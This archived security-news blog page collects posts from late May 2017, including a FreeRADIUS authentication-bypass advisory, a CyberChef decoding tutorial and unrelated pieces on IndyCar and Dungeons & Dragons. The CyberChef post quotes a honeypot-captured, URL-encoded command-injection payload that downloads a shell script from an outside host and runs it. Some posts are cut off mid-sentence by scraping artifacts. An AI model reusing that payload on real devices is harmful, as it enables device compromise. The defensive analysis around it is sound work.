Archive for May, 2017

FreeRadius Authentication Bypass, (Tue, May 30th)

May 30th, 2017

The RADIUS protocol was originally introduced to authenticate dial-up users.( Remote Authentication Dial-In User Service). While dial-upmodems are gone, RADIUS has stuck around as an all-around authentication protocol for variousnetwork devices. RADIUS itself assumes a secure connection, which was fine during dial-up days, but in modern networks, RADIUS usually relies on TLS.

Today, Stefan Winter released details about a vulnerability in FreeRADIUS, an open source implementation of the RADIUS protocol, which can be used to authenticate successfully without ever sendingvalid credentials [1].

TLS can resume connections.The server caches the session keys to make this possible, and if a client connects back with a known TLS session ID, the keys are retrieved from itscache and used. In itself, the features is not a big problem, and the feature is necessary to achieve optimal performance for TLS. Without being able to resume connections, the TLS handshake has to be established again.

However, the problem with FreeRADIUS is that it assumes that for resumed sessions, the inner authentication, which is the actual RADIUS authentication, already succeeded. This is not always true. A session may be interrupted, and then resumed, before the authentication succeeded.

The result is that an attacker can authenticate to a FreeRADIUS server by first connecting, then suspending and resuming the session. No credentials are necessary.

FreeRADIUS released an update. Version 3.0.14 is no longer vulnerable. If you cant patch right now, then you can also turn off TLS session caching by setting enabled=no in the cache section of the EAP module settings. The vulnerability has been assigned %%CVE:2017-9148%%.

A PoC exploit has been developed, but I have not seen it made public so far.

For details, see the original post by Stefan Winter


Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted in Uncategorized | Comments (0)

Shadow Brokers Launches 0-Day Exploit Subscriptions for $21,000 Per Month

May 30th, 2017

As promised to release more zero-days exploits and hacking tools for various platforms starting from June 2017, the infamous hacking group Shadow Brokers is back with more information on how to subscribe and become a private member for receiving exclusive access to the future leaks.

The Shadow Brokers is the same hacking group who leaked NSA’s built Windows hacking tools and zero-day

Posted in download hacking tools, hacking news, hacking tools, The Shadow Brokers, zcash, zero-day exploit, Zero-Day Vulnerability | Comments (0)

ISC Stormcast For Tuesday, May 30th 2017, (Tue, May 30th)

May 30th, 2017

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted in Uncategorized | Comments (0)

Atif Ghauri, Herjavec Group – Enterprise Security Weekly #46

May 29th, 2017

Atif Ghauri is the CTO for Herjavec Group USA and comes on the show to talk about SEIM, EUBA and how to build a relationship with your MSSP! Atif has over 15 years of experience in technology strategy, implementation, and business development from Comcast, IBM and Unisys. Prior to Herjavec Group, he spent four years

Posted in Enterprise Security Weekly, EUBA, MSSP, seim, UBA | Comments (0)

Russian Hackers Made ‘Tainted Leaks’ a Thing — Phishing to Propaganda

May 29th, 2017

We came across so many revelations of sensitive government and corporate data on the Internet these days, but what’s the accuracy of that information leaked by unknown actors?

Security researchers have discovered new evidence of one such sophisticated global espionage and disinformation campaign with suspected ties to the Russian government that’s been aimed to discredit enemies of the state.

Posted in Cyber Attack, data breach, google amp, hacking news, phishing attack, Russian hackers, Tainted Leaks | Comments (0)

News – Enterprise Security Weekly #46

May 28th, 2017

Stopping insider threats with machine learning, the importance of inspecting encrypted traffic, performance and security relations, and what to do if you’re SOC is overwhelmed with too many SEIM alerts. Full Show Notes

Posted in Enterprise Security Weekly, IOCs, machine learning, seim, SoC, SSL, ssl decryption | Comments (0)

Racer Graham Rahal tells us about his Indy 500 preparations

May 28th, 2017

Enlarge / Graham Rahal during practice for the Indianapolis 500 this year. (credit: Michael Hickey | Getty Images)

The 101st running of the Indianapolis 500 is just one of the big races taking place this Memorial Day weekend. And ahead of the big event—which has seen plenty of interest this year as F1 star Fernando Alonso is joining the fun—we spoke with racer Graham Rahal about his approach to the race.

Rahal is the son of Bobby Rahal, a very successful racer in his own right (with three IndyCar championships and an Indy 500 win to his name). In fact, Graham even races for his father’s team.

Driving an IndyCar, particularly for 500 miles at Indianapolis, is quite a challenge. Unlike many other racing series, the cars are extremely physical, lacking power steering. And they don’t have quite the same level of driver aids and electronic support systems that other series like Formula 1 or the World Endurance Championship allow.

Read 3 remaining paragraphs | Comments

Posted in Cars Technica, Indy 500, IndyCar | Comments (0)

Analysis of Competing Hypotheses (ACH part 1), (Sun, May 28th)

May 28th, 2017

In threat intelligence, by definition, an analyst will most of the times have to perform assessments in an environment of incomplete information, and/or with information that is being produced with the purpose of misleading the analyst.

One of the well-known methodologies is the Analysis of Competing Hypotheses (ACH) [1], developed by Richards J. Heuer, Jr., a former CIA veteran. ACH is an analytic process that identifies a set of alternative hypotheses, and assesses whether data available are either consistent or inconsistent with each hypothesis. The hypotheses with most inconsistent data will be rejected. To quote Heuers words

ACH is a tool to aid judgment on important issues requiring careful weighing of alternative explanations or conclusions. It helps an analyst overcome, or at least minimize, some of the cognitive limitations that make prescient intelligence analysis so difficult to achieve.

It is very important to note that the goal of ACH is to reject as many hypotheses as possible, not to confirm any.

One of the advantages of using ACH is that it reduces analysts confirmation bias. In fact, a common pitfall during analysis usually is to form a hypothesis on our head and to look for evidences that support it, confirming indeed our initial line of thought following the most likely hypothesis. However, such approach does not take into account possible alternate hypotheses, as well as what other data is missing that should be there if that given hypothesis would be true. This is achieved by imposing the analyst to identify, and then refuse, as many competing hypotheses as possible using all data available.

How it works

ACH requires the analyst to collect all the related information and organize them in a matrix: all the hypotheses on the top (first row), and all the relevant information on the left side (the first column). In this way, every piece of information can be evaluated against each of the hypotheses, by assessing if its consistent or inconsistent. Heuer describes the full process in eight steps, which could be summarized as follow:

  1. Identify all hypotheses. Ideally, all hypotheses should be mutually exclusive, meaning that if one is true all the others must be false.
  2. Lists evidences and arguments relevant for and against each hypothesis. This has to include also assumptions and logical deductions.
  3. Create a matrix as described above and analyze each evidence against every hypotheses by defining whether is Consistent, Inconsistent or Not applicable / Not relevant, in an attempt to disprove as many hypotheses as possible. In Heuer words, analyze the diagnosticity width:500px” />


    ACH is just one of the possible structured analytic techniques available. I personally like it very much and find it quite useful. But remember that while the matrix helps in creating a model for the analysis of problems with conflicting information and it generates a definitive mathematical total for each hypothesis, at the end it is still up to the analyst to use his/her judgment to make the final conclusion.

    This was a very brief introduction of ACH, and in my next diary I will apply ACH to a practical recent case. But I definitely encourage those interested to go through Heuers book for a deeper explanation of such model.

    Happy Hunting,


    [1] Psychology of Intelligence Analysis, Center for the Study of Intelligence, Central Intelligence Agency.
    [2] Scott J. Roberts, ACH Analysis of a Trump Campaign Compromise,

    Pasquale Stirparo, Ph.D.

    (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted in Uncategorized | Comments (0)

CyberChef a Must Have Tool in your Tool bag!, (Sun, May 28th)

May 28th, 2017

This multipurpose and feature rich tool has been available for a while now and is updated regularly. What I find the most interesting is the number of features that are available this tool.

CyberChef is fully portable and can be downloaded locally as an simple HTML self-contained page that can run in any browsers or if you prefer, you can download the package from Github and compile it yourself[2] but why bother. Since the code is updated regularly, I find the first option more practical. It contains a large number of Operations such as Encoding/Decoding, Logical Operations, Extractors and Hashing to name a few. Note, each one of these Operations expand into a large subset of tools. Here is the complete list of Operations:

For example, take this Web Hex encode data stream that I captured today in my Honeypot:

submit_button=change_action=action=commit=ttcp_num=2ttcp_size=2ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%64%6F%6D%73%74%61%74%65%73%2E%73%75%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`StartEPI=1

First, take copy the data from %63%64[…]%73%68 and do a search and replace to remove the percent (%) from the data because CyberChef doesn width:979px” />

If you have been looking for a multipurpose tool, this is the one. Give it a try!


Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted in Uncategorized | Comments (0)

A fascinating graphic novel about the origins of Dungeons & Dragons

May 27th, 2017

Almost 10 years ago, journalist David Kushner had a chance to interview Gary Gygax and Dave Arneson, the two creators of Dungeons & Dragons, before they died. Kushner’s reporting became a story for Wired, and now he’s expanded the scope of his tale into a graphic novel. Rise of the Dungeon Master, beautifully illustrated by Koren Shadmi, is both a moving portrait of two creative outsiders and a chronicle of how a new kind of storytelling changed pop culture forever.

Kushner recounts the story of Gygax and Arneson in the second person, addressing the reader as if Kushner were the dungeon master. “You” are young Gygax, the child of immigrants growing up in the midwest, seeking escape from ordinary life by exploring the wilderness, hunting, and eventually learning to break into an old, abandoned asylum. The narrative technique sounds gimmicky, but it works: you’re sucked into the story and into immediate sympathy with Gygax as he traces his fascination with adventure games back to his childhood, when he climbed around in the maze of tunnels below the creepy asylum’s rotting rooms.

Nation Books

Read 7 remaining paragraphs | Comments

Posted in Dave Arneson, david kushner, Gary Gygax, koren shadmi, rise of the dungeon master, The Multiverse | Comments (0)